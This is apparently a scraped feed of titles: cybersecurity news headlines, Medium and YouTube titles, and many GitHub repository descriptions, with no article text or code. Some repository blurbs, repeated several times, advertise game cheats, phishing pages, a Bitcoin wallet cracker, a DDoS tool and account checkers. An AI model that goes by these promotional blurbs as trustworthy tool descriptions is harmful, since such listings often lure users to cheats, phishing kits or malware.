GitHub comments abused to push malware via Microsoft repo URLs
Critical Forminator plugin flaw impacts over 300k WordPress sites
Block 840,000: Bitcoin Halving Day | by Prof Bill Buchanan OBE | ASecuritySite: When Bob Met Alice | Apr, 2024 | Medium
Unsecured Content Provider leads to Account Takeover | by Ahmed Elmorsi | Apr, 2024 | Medium
Critical Update: CrushFTP Zero-Day Flaw Exploited in Targeted Attacks
Palo Alto Networks Discloses More Details on Critical PAN-OS Flaw Under Attack
Incident Response: Four Key Measures to Protect Your Business
The Week in Ransomware - April 19th 2024 - Attacks Ramp Up
CrushFTP warns users to patch exploited zero-day “immediately”
MITRE revealed that nation-state actors breached its systems via Ivanti zero-days
Rethinking How You Work with Detection and Response Metrics
CISO Corner: Breaking Staff Burnout, GPT-4 Exploits, Rebalancing NIST
Miggo Launches Application Detection and Response (ADR) Solution
FBI Director Wray Issues Dire Warning on China's Cybersecurity Threat
5.3M World-Check records may be leaked; how to check your records
HelloKitty ransomware rebrands, releases CD Projekt and Cisco data
MITRE says state hackers breached its network via Ivanti zero-days
United Nations agency investigates ransomware attack, data theft
LastPass Users Lose Master Passwords to Ultra-Convincing Scam
UNDP, City of Copenhagen Targeted in Data-Extortion Cyberattack
Akira takes in $42 million in ransom payments, now targets Linux servers
New Five Eyes AI security guidelines unveiled
In memoriam: Steven Young, respected CISO and former Cybersecurity Collaborative VP
Attacks against SAP apps on the rise
Tuta Mail (Tutanota) Accuses Google of Censoring Its Search Results
22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
Cisco's Complex Road to Deliver on Its Hypershield Promise
AI Lowers Barrier for Cyber-Adversary Manipulation in 2024 Election
Ransomware in Q1 2024: Frequency, size of payments trending downwards, SMBs beware!
Alarming Decline in Cybersecurity Job Postings in the US
French hospital impacted by cyberattack
Octopharma Plasma's US operations shut down due to suspected ransomware attack
BlackTech Targets Tech, Research, and Gov Sectors New 'Deuterbear' Tool
How Attackers Can Own a Business Without Touching the Endpoint
Akira Ransomware Gang Extorts $42 Million; Now Targets Linux Servers
Unlocking the Power of Portfolio Analysis - A Comprehensive Guide
What’s the deal with the massive backlog of vulnerabilities at the NVD?
Talos "In the Headlines"
Akira Ransomware Group Rakes in $42m, 250 Organizations Impacted
How ADR – application detection and response – can become the ‘EDR for apps’
FBI chief says China is preparing to attack US critical infrastructure
LastPass users targeted by vishing attackers
AuditBoard expands executive team to support the next phase of growth
'MagicDot' Windows Weakness Allows Unprivileged Rootkit Activity
United Nations Development Programme (UNDP) investigates data breach
Hackers Target Middle East Governments with Evasive "CR4T" Backdoor
Unveiling Access Control Flaws: Taking over an entire organization | by mohamed othman | Apr, 2024 | Medium
New infosec products of the week: April 19, 2024
Protobom: Open-source software supply chain tool
The key pillars of domain security
JAVA-Based Sophisticated Stealer Using Discord Bot as EventListener
Cyberattack Takes Frontier Communications Offline
IDOR Lead to Data Leak. Hello, hackers. My name is Mostafa… | by Mostafa Elguerdawi | Apr, 2024 | Medium
A Beginner’s Guide To Insecure Deserialization | by four0four | Apr, 2024 | Medium
51% of enterprises experienced a breach despite large security stacks
Evil XDR: Researcher Turns Palo Alto Software Into Perfect Malware
DarkGPT — AI OSINT Tool Powered By ChatGPT-4 To Detect Leaked Databases | by Itsmeanzee | Apr, 2024 | Medium
Fake cheat lures gamers into spreading infostealer malware
From Hackers to Streakers – How Counterintelligence Teams are Protecting the NFL – Joe McMann – ESW #358
Frontier Communications shuts down systems after cyberattack
Porter Airlines Cybersecurity Consolidation
Protecting Employees' Sensitive Data on the Web
Auburn's McCrary Institute and Oak Ridge National Laboratory to Partner on Regional Cybersecurity Center
ICS Network Controllers Open to Remote Exploit, No Patches Available
Cisco Warns of Massive Surge in Password Spraying Attacks on VPNs
For Service Accounts, Accountability Is Key to Security
GPT-4 Can Exploit Most Vulns Just by Reading Threat Advisories
Microsoft finds Kubernetes clusters targeted by OpenMetadata exploits
8Base Ransomware Claims Breach On Atlantic States Marine Fisheries Commission | Daily Security Review
FBI: Akira ransomware raked in $42 million from 250+ victims
840-bed hospital in France postpones procedures after cyberattack
Russian APT Group Thwarted in Attack on US Automotive Manufacturer
‘MadMxShell’ leverages Google Ads to deploy malware via Windows backdoor
FIN7 targeted a large U.S. carmaker phishing attacks
Could the Brazilian Supreme Court finally hold people accountable for sharing disinformation?
Google ad impersonates Whales Market to push wallet drainer malware
Microsoft Office LTSC 2024 preview available for Windows, Mac
Quishing Attacks Jump Tenfold, Attachment Payloads Halve
Russia’s Sandworm Upgraded to APT44 by Google's Mandiant
Law enforcement operation dismantled phishing-as-a-service platform LabHost
OfflRouter Malware Evades Detection in Ukraine for Almost a Decade
Cybercriminals pose as LastPass staff to hack password vaults
Rebalancing NIST: Why 'Recovery' Can't Stand Alone
New Cyber-Threat MadMxShell Exploits Typosquatting and Google Ads
Uncovering DDoS Vulnerabilities with Simulation Testing: A Case Study
Bill restricting personal data purchases gains House OK
Russia’s Sandworm APT linked to attack on Texas water plant
Countering Voice Fraud in the Age of AI
Break Security Burnout: Combining Leadership With Neuroscience
Open Source Tool Looks for Signals in Noisy AWS Cloud Logs
New attack campaign involves Fortinet FortiClient vulnerability exploitation
Novel Kapeka backdoor leveraged in Sandworm attacks
Ransomware attack compromises UN agency data
US automaker subjected to FIN7 attack
US election-targeted influence operations by Russia ramp up
Unpacking the NIST cybersecurity framework 2.0
FIN7 Cybercrime Group Targeting U.S. Auto Industry with Carbanak Backdoor
Gurucul federated search provides insights into data that is not centralized
Global Police Operation Disrupts 'LabHost' Phishing Service, Over 30 Arrested Worldwide
How to Conduct Advanced Static Analysis in a Malware Sandbox
New Android Trojan 'SoumniBot' Evades Detection with Clever Tricks
Recover from Ransomware in 5 Minutes—We will Teach You How!
Ivanti patches critical Avalanche flaw exploitable via a simple message (CVE-2024-29204)
Immuta launches Domains policy enforcement to improve security and governance for data owners
US Election Officials Told to Prepare for Nation-State Influence Campa
Six ways to fend off spam in corporate networks
Previously unknown Kapeka backdoor linked to Sandworm APT
Authorities take down LabHost, phishing-as-a-service platform
Redgate Monitor Enterprise prevents unauthorized access to sensitive information
SAS unveils products and services to help customers embrace AI
LabHost phishing service with 40,000 domains disrupted, 37 arrested
Nigeria, Romania Ranked Among Top Cybercrime Havens
Sneaky Shellcode: Windows Fibers Offer EDR-Proof Code Execution
Trust in Cyber Takes a Knock as CNI Budgets Flatline
UK Police Lead Disruption of £1m Phishing-as-a-Service Site LabHost
Open Source Intelligence Tools & Techniques Explained With Case Studies | by Motasem Hamdan | Apr, 2024 | Medium
Cisco warns of a command injection escalation flaw in its IMC
Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)
6 Phone Management Tips When Traveling Abroad
ICS/OT Penetration Testing of Schneider Modicon TM221: A Beginner’s Guide | by Marcel Rick-Cen | Apr, 2024 | Medium
Hackers Exploit OpenMetadata Flaws to Mine Crypto on Kubernetes
Malicious Google Ads Pushing Fake IP Scanner Software with Hidden Backdoor
Bots dominate internet activity, account for nearly half of all traffic
Who owns customer identity?
Cheap ransomware for sale on dark web marketplaces is changing the way hackers operate
Enterprises face significant losses from mobile fraud
The Many Faces of Undetected macOS InfoStealers | KeySteal, Atomic & CherryPie Continue to Adapt
How I got JS Execution (DOM XSS) Via CSTI | by Amr | Apr, 2024 | Medium
Delinea has cloud security incident in Thycotic Secret Server gaffe | by Kevin Beaumont | Apr, 2024 | DoublePulsar
92% of enterprises unprepared for AI security challenges
Crazy Crypto: Meet CVE-2024–31497 | by Prof Bill Buchanan OBE | ASecuritySite: When Bob Met Alice | Apr, 2024 | Medium
FIN7 targets American automaker’s IT staff in phishing attacks
Hackers hijack OpenMetadata apps in Kubernetes cryptomining attacks
SoumniBot malware exploits Android bugs to evade detection
Redgate Launches Enterprise Edition of Redgate Monitor
Dangerous New ICS Malware Targets Orgs in Russia and Ukraine
🌵Unauthenticated Cache Purging Vulnerability | by AbhirupKonwar | Apr, 2024 | Medium
Upgrades!!! — Everything new with Kubernetes 1.30 | by Imran Roshan | Google Cloud - Community | Mar, 2024 | Medium
Brute-force attacks surge worldwide, warns Cisco Talos   
Hacker Heroes – Winn Schwartau – PSW #825
Moldovan charged for operating botnet used to push ransomware
Charlotte AI’s Multi-AI Approach
Ivanti Releases Fixes for More Than 2 Dozen Vulnerabilities
Active Kubernetes RCE Attack Relies on Known OpenMetadata Vulns
A peek inside Inferno Drainer. Inferno Drainer is a widely used piece… | by Bernhard Mueller | Apr, 2024 | Medium
Linux variant of Cerber ransomware targets Atlassian servers
Why Security Orchestration, Automation and Response (SOAR) Is Fundamental to a Security Platform
Cerebral Settles Suit At $7 Million In Facebook Pixel Data Leak Case | Daily Security Review
Ivanti Issues Security Updates To Critical Flaws In Avalanche MDM Solution | Daily Security Review
UnitedHealth Reports That Change Healthcare Cyberattack Caused $872 Million Loss | Daily Security Review
Turning Wayback Machine Into GOLD MINING MACHINE | by Ott3rly | Apr, 2024 | InfoSec Write-ups
Tutorial on x86 Architecture: From Basics to Cybersecurity Links | by ElNiak | Apr, 2024 | InfoSec Write-ups
XSS Unpacked: What It Is, How It Works, and How to Stop It | by Fahri Yeşil | Apr, 2024 | InfoSec Write-ups
Acoustic Side Channel Attacks on Keyboards: A Deep Dive into Typing Patterns and Security Implications | by ElNiak | Apr, 2024 | InfoSec Write-ups
Breaking Safeguards: Unveil “Many-Shot Jailbreaking” a Method to Bypass All LLM Safety Measures | by ElNiak | Apr, 2024 | InfoSec Write-ups
Creating Payloads with ScareCrow to Mimic Reputable Sources and Bypass Anti-Virus | by Cybertech Maven | Apr, 2024 | InfoSec Write-ups
CVE-2024–3400: A Critical Vulnerability in PAN-OS Firewalls | by ElNiak | Apr, 2024 | InfoSec Write-ups
How I Hack Web Applications (Part 1) | by Rafin Rahman Chy | Apr, 2024 | InfoSec Write-ups
If You Want To Be A CISO, Then Read This First … | by Taimur Ijlal | Apr, 2024 | InfoSec Write-ups
Investigating The Files With Forensics | CTF Newbies | by HackTheBox SRMIST | Apr, 2024 | InfoSec Write-ups
My Journey with CRTO: A Review. I’m excited to announce my recent… | by JustAnother-Engineer | Apr, 2024 | InfoSec Write-ups
NTFS Filesystem: Alternate Data Stream (ADS) | by David Varghese | Apr, 2024 | InfoSec Write-ups
Storm Breaker: Unveiling the Power of the Social Engineering Tool | by ElNiak | Apr, 2024 | InfoSec Write-ups
The Impact of Cyberattacks on Brand Reputation: How to Minimise Damage | by LucyCouser13 | Apr, 2024 | InfoSec Write-ups
Make Money 💸 Using Google Hacking | by Ott3rly | Apr, 2024 | Medium
Meeting Man Who Broke North Korea’s Internet & iPhones Under Attack, Cyber News Beat | by Michael Lopez | Apr, 2024 | Medium
Critical vulnerability in PuTTY exposes private keys | by Patrik Žák | Apr, 2024 | Medium
2x2TB USB Disks for £58!. I received this advert for a 2TB USB on… | by Prof Bill Buchanan OBE | Apr, 2024 | Medium
Can we trust AI to take care of us? | by Linda Margaret | Brain Labs | Apr, 2024 | Medium
How to Learn Cybersecurity at Home | by Tyler Wall | Mar, 2024 | Medium
Explore topics
Sanitising Your Git History. How to clear your Git to improve… | by Jake Teo | Apr, 2024 | Level Up Coding
My Grandfather Didn’t Trust Banks. Now, Digital Banking Makes People Feel the Same Way. | by George “Ace” Acevedo | ILLUMINATION-Curated | Apr, 2024 | Medium
Medium
Marine Corps’ overseas cyber force mission seeks stronger critical infrastructure defenses
Xiid SealedTunnel: Unfazed by Yet Another Critical Firewall Vulnerability (CVE-2024-3400)
Russian Sandworm hackers pose as hacktivists in water utility breaches
Cisco discloses root escalation flaw with public exploit code
Enterprise Endpoints Aren't Ready for AI
Linux Cerber Ransomware Variant Exploits Atlassian Servers
Bot attacks spike
New ODNI data acquisition guidance imminent
Total Cyber Command hunt forward missions disclosed for the first time
US jails former Amazon security engineer for DeFi hacks
Codename RKN – Ecsypno
CTO at NCSC Summary: week ending April 21st
Codename SCNR – Ecsypno
Elon Musk says he opposes TikTok ban as bill returns to Capitol Hill
The Arachni Chronicles – Ecsypno
New Android Trojan 'SoumniBot' Evades Detection with Clever Tricks
Triaging Files on VirusTotal - YouTube
How to Analyze Mustang Panda's Malware Attacks to Gain Intelligence - NetNoiseCon - YouTube
How to Analyze Mustang Panda's Malware Attacks to Gain Intelligence - NetNoiseCon - YouTube
Home Break-In Caught on Camera: Owner Chases Off Bike Thieves! - YouTube
Products — JimyLong's Lockpicks
How to Analyze Mustang Panda's Malware Attacks to Gain Intelligence - NetNoiseCon - YouTube
Akira Ransomware Gang Extorts $42 Million; Now Targets Linux Servers
Der große Hack bei Volkswagen - China im Fokus - ZDFheute
Review: Genesis lock pick set from Covert Instruments - YouTube
StarkeBlog - Backdooring Dotnet Applications
Abus N 55/40. Opened in one second. - YouTube
Security awareness VS human risk management - why the term you use matters #ciso #cybersecurity - YouTube
Nimperiments/EvilLsassTwin at main · RePRGM/Nimperiments · GitHub
How Attackers Can Own a Business Without Touching the Endpoint
LastPass users targeted in phishing attacks good enough to trick even the savvy | Ars Technica
UK cyber agency NCSC announces Richard Horne as its next chief executive
PVML receives $8 million in Seed for its secure AI-powered data access platform | Ctech
How Hackers Use Wireshark for Password Sniffing: What does Wireshark do? - HackProofHacks
UK police bust worldwide million-dollar crime-as-a-service hub LabHost | TechFinitive
✂️ The hazards of locksport - YouTube
SEC.gov | Request Rate Threshold Exceeded
Federal Bureau of Investigation
Project Zero: The Windows Registry Adventure #1: Introduction and research results
A Super In-depth Look At The REPLICANT from Covert Instruments - YouTube
Web API Security Champion: Broken Object Level Authorization (OWASP TOP 10) | DevSec Blog
Replicant Mold and Cast Instructional - YouTube
Large-scale brute-force activity targeting VPNs, SSH services with commonly used login credentials
Introducing Cloud Console Cartographer: An Open-Source Tool To Help Security Teams Easily Understand Log Events Generated by AWS Console Activity
Breaking Custom Encryption Using Frida (Mobile Application Pentesting) | Cognisys Labs
How to combat generative AI security risks | LeadDev
Shielder - Element Android CVE-2024-26131, CVE-2024-26132 - Never Take Intents From Strangers
892. American 1100 padlock picked open with cheap budget modified half snowman lock pick - YouTube
503 - Service Unavailable Error
American Lock 2500 picked and gutted! - YouTube
An Obscure Actions Workflow Vulnerability in Google’s Flank – Adnan Khan's Blog
Paclock PL410-pro pick - YouTube
Attackers exploiting new critical OpenMetadata vulnerabilities on Kubernetes clusters | Microsoft Security Blog
Malicious cyber activity spiking in Philippines, analysts say
Blutus Team - BEST HACKING LEAGUE 2024
EQR stands for Elastic Querying and Reporting! This is a simple Proof Of Concept querying Elastic logs for relevant security info, and generating a report.
GDSC AI HACK 2024
This repository holds the 404 Founders hack:
Spring_security
This script facilitates automatic updates to firewall aliases based on DNS entries, enabling dynamic FQDN firewall rules in Proxmox environments. It's designed to ensure that firewall configurations remain synchronized with DNS changes, enhancing security
Spring Boot 3.X 에 Spring Security 연동
Collaboration Hub: Streamline project management with live video calling, task manager, real-time coding, and group messaging. Coming soon: AI chat and advanced team collaboration. Prioritizing security and privacy for seamless teamwork.
This repository is going to be more focused on the tools for cyber security using tor proxies for anonymous pen testing .
LA Hacks submission 2024
SpringSecurity_Test
This is a repository for our group's Final Year Engineering project which involves finetuning an open-source Large Language Model (LLama2) for cyber-security text summarization. This repo contains the frontend code, the Colab FineTuning code, and the Cola
LA Hacks competition
SpringSecurityUsingMySQL
LA Hacks 2024
Hexagonal architecture, Go, Tracing, Logging and Keycloak (WIP)
This is the LA Hacks 2024 project
This is a proof of concept implementation(not a a fully functioning, ready for production block chain) to help me to understand what a blockchain is by creating one.
This is a repository for developing a proof of concept for a Chatbot for Hope Holistic Care
The Food System Optimization Analysis Project utilizes advanced modeling and technology to enhance global food systems focusing on sustainability and fairness. Employing methods like BWM, EWM, and genetic algorithms, it develops the 4SD Model, providing a
rep for methi hack
Hacker News Explorer
light-security-helper
1.20.4 hacked client base, also Test :3
RAG Proof of Concept for internal Document and Knowledge Search
Here is Hacking-Group-0872-Slide
Location guessing app by team Absolutne Enote for Dragon Hack 2024
The Hacker Org.
用于存放一些我在打hack the box 时用的一些常用工具或脚本
HACKINGZX
Project for BEST Hacking League named CORDI
A GitHub repository for a fictional company's website, serving as an educational platform in security, web design, and systems analysis and design.
Projekt na hakaton Best Hacking League
Cloud-Security
LA Hacks 2024 Project
Cultivar Life unites investors, landowners, and farmers in Bangladesh, facilitating informed decisions with land insights, climate data, and fair compensation. Boosting agriculture for economic stability and food security.
Bitcoin Hacking , Crypto miner , bitcoin bruteforce , bitcoin wallet cracker , walletminer , btc miner , metamask recovery tool ,
our LA Hacks
스프링 시큐리티 인 액션 책에 나온 실습 예제를 수행해봅니다. (Gradle Multi Module로 설정)
spring-jwt-security-example
Document Manager Java project created to study security in web applications
Genshin Impact Cheat , Hack , Aimbot , Esp , Wallhack , Kill Aura , KillAura , Auto TP , External Launcher That Uses Efi Drivers
Internet_Security
Hack
spring-security-example
Project for LA Hacks, 2024
BlockVote is a blockchain based E-voting system which provides security to overall infrastructure by hashing algorithm SHA-256.
Weight watchers app for LA Hacks 2024
Dayz Cheat , Hack , Aimbot , Esp , Wallhack , WH , External Launcher That Uses Efi Drivers
best-hacking-league-project
Project On IBM Qradar SIEM Tool
Palworld Cheat , Hack , Aimbot , Esp , Wallhack , WH , External Launcher That Uses Efi Drivers
Best Hacking League hackathon project
contract testing proof of concept
For the AI hack
multirole-spring-security-boot-application
Hacking-tool
a python proof of concept for cve-2024-24576
proyecto con fines educativos. para practicas de ethical hacking e ingenieria social
Security
Social Hacking x Instagram,Facebook,Twitter
Developed scalable e-commerce backend with Spring boot, Hibernate. Built the Complete Domain Design using Spring Data JPA Mapping. Implemented the Security using OAuth2.0. Have Built the Register APIs, Login/Logout APIs, Forget Password APIs, Admin APIs,
This is a repository for practical part of bachelor thesis "Security analysis of blockchain consensus protocols".
Multi-firmware proof-of-concept
testSecurity
pseudo-cancelated holes, proof of concept
LA Hacks project
Arduino esp32 WiFiMulti fork - Hidden SSID hack
Introducing a dynamic cyber security website designed to educate and raise awareness. Featuring interactive tests in three languages and rich resources, users can explore the world of cyber security with ease. Responsive and sleek, this frontend-only site
myAdvancedSecurityOrgLevel
Home page for everything about our hacking team D0M BU$TЄR$
Proof of Concept on Dask Distributed Computation
BackEnd Made with Spring Boot, Spring Data, Spring Web MVC, Spring Validation, Spring Security, Lombok, Model Mapper, Jackson, MySQL and JWT.
This project contains Python scripts that ensure some security good practices in AWS.
Vertex AI proof of concept.
Proof of Concept on Ray.io
automated tool designed to streamline the search and identification of Proofs of Concept (POCs)
Master Java, Spring 6 and Spring Boot 3 with JDBC, JPA, Security, Docker and Microservices with Telusko
AD_Network CRUD with Spring Boot, Spring Security, Thymeleaf, Spring Data JPA, SQL Server
Computer Security
Proof of Concept of Door Lock with input of keypad with Arduino and C
proof of concept dapp showcasing mechanisms that assist in identity verification. coded in solidity html css js
jewellry_Security
Java-Spring-Boot-Security-Project-1.0
Hacking Web3 team
Illusion-Eye can be powerful resources for ethical hacking and cybersecurity, they should be used responsibly and ethically.
Hardware-Security-Analysis
SpringSecurityPOC
91 club hack app
SpringBoot + SpringCloud + Mysql + MybatisPlus + Redis + Nacos + Gateway + Feign + RabbitMQ + Seata + Security + Jwt实现的微服务框架
To practice coding browser extensions I am creating a project to circumvent adds on twitch.tv without actually blocking them. This project is a very early prototype and mostly a proof of concept.
Creation of a home cybersecurity training lab that includes the following component requirements: Kali Linux or personalized attack machine, (pfSense or OPNsense) Firewall, (Snort or Suricata) Intrusion Detection/Prevention System, (Wazuh or Splunk) Secur
hacking-tools
Game Cheat Imgui Hack Menu Cpp
HACK-AI-THON 2023
Ethical-Hacking-of-API
In the enchanting realm of gaming, DLLX1 reigns supreme as a paragon of excellence. A fully realized internal hack tailored exclusively for Valorant,
OnlineHacking-Freefire-Phishing
Hacker News stories respository used to search stories from Hacker news API
Created a new repository for Hack Innovate Hackathon
Projeto AWA para gameficação do aprendizado!
Call of Duty Warzone has gained significant popularity over time, attracting millions of global players. Lavicheats offers cheats and hacks that can give you an unbeatable
Golang Map Hack for Albion
Hacking SQL Server .bak files
Implemented DevOps practices to deploy a scalable gaming app on Amazon EKS. Utilized Fargate, Kubernetes resources, Ingress, and ALB for external access. Configured Ingress Controller, reducing load balancer costs. Achieved scalability, availability, and
Experimenting with Spring security features
Repository for a proof of concept exploring API interactions with S3 buckets for enhanced data storage solutions.
Explore my Network Mastery Toolkit: A collection of troubleshooting guides, network setup documentation, security protocols, and more, crafted to showcase my journey and skills in network administration and helpdesk support.
Proof-of-concept projects coded in Python
The K8s-WordPress-Deployment-Solutions repository streamlines WordPress deployment on Kubernetes, enhancing reliability, security, and data integrity. It addresses common challenges, offering comprehensive solutions for seamless setup and management of Wo
Large collection of projects developed for proof of concepts
Lit 🔥 review application proof of concept for data structures and algorithms group project
project which shows 2 step gate security system. It focuses on arduino.
A Rate-Limiter-Service proof of concept which would act as rate limiter to provide a middleware service
A proof of concept for Sportson app.
A Simple JS Hack For Memrise To Get Easy Points
this repository includes a simple Python script using the Pandas library, which allows you to analyze the main metrics provided as part of the "Tender Hack", which was held in the city of Vladivostok on April 19 - April 21
For Bath Hack 2024, my team aimed to implement gesture controls in a robotic arm. I attempted to implement sensor fusion using an extended Kalman filter.
This is a proof of concept
Repository for 9-hacks. A webapp for streamlining the process of interaction between students/faculty and the consellors.
ENGR101-RubySecurity
Ongoing security projects where various cybersecurity techniques are explored and developed. From TCP socket communication to advanced encryption methods, this repository is dedicated to learning and experimentation in the field of cybersecurity.
This is a repository that stores the telegram bot on aiogram code for the Nuclear Hack
Proof-of-concepts implementation of the Merkle Datasets approach
This is the code for a python GUI app made for an IoT project.
Cadastro de eventos com SpringBoot e Spring Security
Spring Boot REST application. News portal where you can discuss the articles. JWT token OpenApi(swagger) Spring Security JPA(Hibernate) (Status: abandoned)
DSTU HACK 2024
Hacking SQL Server .bak files
OnlineHacking-FreeFire-Phishing.
first-security-app
CyberSecurity-NM
BlazorAppTestSecurityScan
OnlineHacking-FreeFire-Phishing
hw2_security
API Rest Spring Boot 3 | Liberando acesso CORS | Spring Security | JSON Web Token (JWT) | BD PostgreSQL
Login form with Spring Boot 3, Spring Security, JWT and Angular
try to hack me..!
A list of awesome cloud security events
Android WebView Exploit Using Java Proof Of Concept
Here i Explore Hacker News Posts to analyze which are the best hours to post an Ask HN post in order to get the most ammount of responses (comments)
Proof-of-concept PKI-based database.
Created a replica Instagram login page for educational purposes, demonstrating phishing techniques used by hackers.
Java-Spring-Security-Project
proof of concept for pulling upcoming concert listings from our marketing form spreadsheet
Proyecto pwa
A brief mapping tutorial, proof of concept for using bupyterbook and binder
WiFi Hacking with an ESP8266 - Deauth combined with Evil Twin attack
layer0-solana-ai-security
URI bootcamp homework 21. Convert REST to Graph QL, add security for Book Search App. MJS 4.18.24
A proof of concept containing several UI libs
Template for Spring Security
Hacker ho
WebVTT Same-Origin Proof of Concept
spring-security-token-based-rememberme
100 Days of Swift Project 1
`Interactive App and Game Design with Unity` - LA Hacks Workshop 2024
My python implementation of Fallout hacking microgame
External Game Project primarily written in C++, utilizing external libraries. Im actively combating scammers while developing various cheats and tools for games, including Hack Cheat Driver Esp Aimbot Magic Bullet, Driver Injector Overlay, and Imgui.
THE HACK
Using spring boot,spring security,jwt token
All files for INFO 1601 final project. Group name: Baby Hack Ribs
My final project for Information Design. The task was to select a real-world issue and create something based on it, so I chose cybersecurity (with an emphasis on phishing and password security) and created a website.
Proof-Of-Concept
proof of concept for recursive searches and anayltics
Im actively combating scammers while developing various cheats and tools for games, including Hack Cheat Driver Esp Aimbot Magic Bullet, Driver Injector Overlay, and Imgui
Bot game about a hacker cat
A simple and lightweight Laravel package for generating and verifying one-time passwords (OTPs), enhancing authentication security in your Laravel applications.
SecureOTP is a powerful WordPress plugin designed to enhance security and streamline form submissions on your website. With SecureOTP, you can easily implement OTP (One-Time Password) verification for user phone numbers, ensuring secure access and reducin
Train security system
Data for global food security
This project aimed at revolutionizing agricultural practices by harnessing the power of predictive analytics and machine learning. Focused on five crucial crops - rice, wheat, tomato, potato, and maize (corn) - this project endeavors to safeguard global f
It is a web-based dairy shop management system utilizing MySQL Server and PHP technologies for streamlined workflow automation and invoice management with robust security measures.
proof of concept project
A simple library that packages functional `sodium_crypt_*` into objects.
Become an ethical hacker
Hacking
flutter_app_security_detected
Hacker news
Some helpfull proof of concept starter template
Some good practices to improve security on RHEL-based servers
Demo app com spring boot 3, spring security e oauth2
With unwavering precision, Google Chrome safeguards user data within an unyielding fortress of security. Hence, for the Mercuria
Projects that i made during the learning phrase
With unwavering precision, Google Chrome safeguards user data within an unyielding fortress of security. Hence, for the Mercuria
Counter Strike 2 cheat, CS 2 hack, CS2 Aimbot, CS2 Bunnyhop, Faceit driver Cheat
pak of hacker
Testing Streamlit development with this proof-of-concept
PHP based sign up form with security and password hashing. And also error managed through try and Catch block of code.
springSecurity
Alfa hack
Stay updated with real-time notifications for Hacker News posts. Get desktop alerts for high-priority topics and browse latest news effortlessly.
Call of Duty Warzone has gained significant popularity over time, attracting millions of global players. Lavicheats offers cheats and hacks that can give you an unbeatable
GO, hacking, experimenting & personal notes
WebVTT Cross-Origin Proof of Concept
This plugin allows administrators to change the base URL prefix of the WordPress REST API, facilitating simple and failproof customization for security or branding purposes.
Information-Security-MiniProject
PasswordChecker is a tool for verifying the reliability of passwords, taking into account certain security requirements.
Cyber-security-project
DDOS-Hacker v2024
sandbox_spring-security
Hacking_Phishing
AN EXPERIMENT ON VAULTS SECURITY
KEYLOGGER & SECURITY
AI-Security-
Hacking
cyber-security
Multiplatform proof of concept C++ TCP back and forth comminication
Web application interface for a smart home security system. This web app allows users to access stored files in cloud storage through a log in system.
A simple and lightweight Laravel package for generating and verifying one-time passwords (OTPs), enhancing authentication security in your Laravel applications.
Enhance the security of your KeyAuth ImGui example by implementing server-side controls, packet encryption, and single-use packets, offering robust protection against unauthorized access.
experience-primer-copilot-SanWang-hack created by GitHub Classroom
Proof of concept of Tauvlo marketplace.
keepass-http-security
Репозиторий для хакатона Alfa x FinU Hack
The editor used to make animations for the Purdue Hackers' Sign
REALLY SIMPLE AND PROOF OF CONCEPT space invaders game for ti-84
Ap2_TrabalhoSecurity
my small projects script
Hwid Spoofer is a C# application that enables you to alter various system identifiers on your Windows computer, offering randomization of critical identifiers like HWID, PC GUID, computer name, product ID, and even MAC address. This tool allows for enhanc
Final course project for CSE350: Network Security
Proof of concept that will hopefully turn into a hosted frontend experience
Forward Hacking Web3 Hackathon
With unwavering precision, Google Chrome safeguards user data within an unyielding fortress of security. Hence, for the Mercuria
With unwavering precision, Google Chrome safeguards user data within an unyielding fortress of security. Hence, for the Mercuria
Copilot-For-Security
Security Projects and whatnot for the 23-24 year
Hack de Pull Request 2 de SocialOplesk
Okta Proof of Concept
proof of concept for my python Bakalari API
fts5_hacking
🌈 The PyTorch implementation of MetaCRL, described in IJCAI 2024 "Hacking Task Confounder in Meta-Learning".
Pentesting cheatsheet with tricks and scripts for reconnaissance, enumeration, privesc, and more...
NSA private hacking tool for fuzzing with malicous indent. Code is for research and educational purposes only!
messing around with dpdk
Data from Hacker News
Fetches Hack News topics and urls using Playwright pages, and download it as CSV file.
Spring Security with H2 Database
Quikeyfy: Zero Transaction Charges, Maximum Security, Total Independence
VisionService is a free multi-tool with many features in the field of cybersecurity and hacking. | VisionServices
FREE CODE CAMP INFO SECURITY APP
Android Biometric Security Files
SecurityBoot
Serverless API with Cognito security
AtividadeSpringSecurity
Repositorio proyecto final UTT
This CTF is a modest introduction to the wide world of cyber security. The goal is to understand the different techniques used to exploit these weaknesses in order to spot them and avoid them.
PP_313_spring-security
demoSpringSecurityThymeleafApp
External Game Project primarily written in C++, utilizing external libraries. Im actively combating scammers while developing various cheats and tools for games, including Hack Cheat Driver Esp Aimbot Magic Bullet, Driver Injector Overlay, and Imgui.
A proof of concept for the potential of an ONNX supply chain attack of the Inswapper model (inswapper_128.onnx)
Im actively combating scammers while developing various cheats and tools for games, including Hack Cheat Driver Esp Aimbot Magic Bullet, Driver Injector Overlay, and Imgui
A proof-of-concept React TextArea component that includes autocorrect
InfoSec & Ethical Hacking Blog
An action-packed Hack&Slash adventure set in the Gothic universe.
API Development
In order to set up Azure sentinel (a cloud-based SIEM) as well as a Virtual Machine in the cloud which is going to be our honeypot to make it super vulnerable to the internet, we first need to setup an azure account and build group security.
A perfect version of Uno, protected from typical memory hacking exploits. Features a dynamic network structure to swap from peer-to-peer to server-client with the click of a button or when server fails. This allows for a robust system that can maintain op
cracking WPA/WPA2 secured WiFi networks with the aircrack-ng suite
Submission for the qualification exercise of the hda hacker contest course
Creating terraform security groups by using map object and dynamic loop
Hwid Spoofer is a C# application that enables you to alter various system identifiers on your Windows computer, offering randomization of critical identifiers like HWID, PC GUID, computer name, product ID, and even MAC address. This tool allows for enhanc
This repository contains cyber security projects
A Python web scraper designed to extract news articles from the Hacker News (HN) website. Hacker News is a popular social news platform that focuses on computer science, technology, and entrepreneurship. This scraper allows you to retrieve news articles a
Web application with tools for security analysts and blue teams
spring-security-tutorial
스프링 시큐리티 JWT 저장소
A ton of different game hacks.
Atividdade-APi-security
This Python application is used to verify the status of Facebook accounts, determining whether they are alive, in checkpoint or dead.
This Python tool is a powerful Facebook account verification tool used to check Facebook profiles and save checked accounts to .txt file.
Group Capstone project repository for Security Operations Center (SOC) implementation.
Markdown notes for Heriot Watt's F20AN - Advanced Network Security module.
external is the setup of libraries, modules, etc. for use as tools for hacking Android applications.
A detailed plan to become proficient in hacking and penetration testing.
hardware_security_aes_project
The Budget-Management-Application optimises financial management for communities. Developed with Java, Spring Boot, and PostgreSQL, it ensures efficient handling of essential tasks. Though basic, its security protocols maintain transparency. Core feature
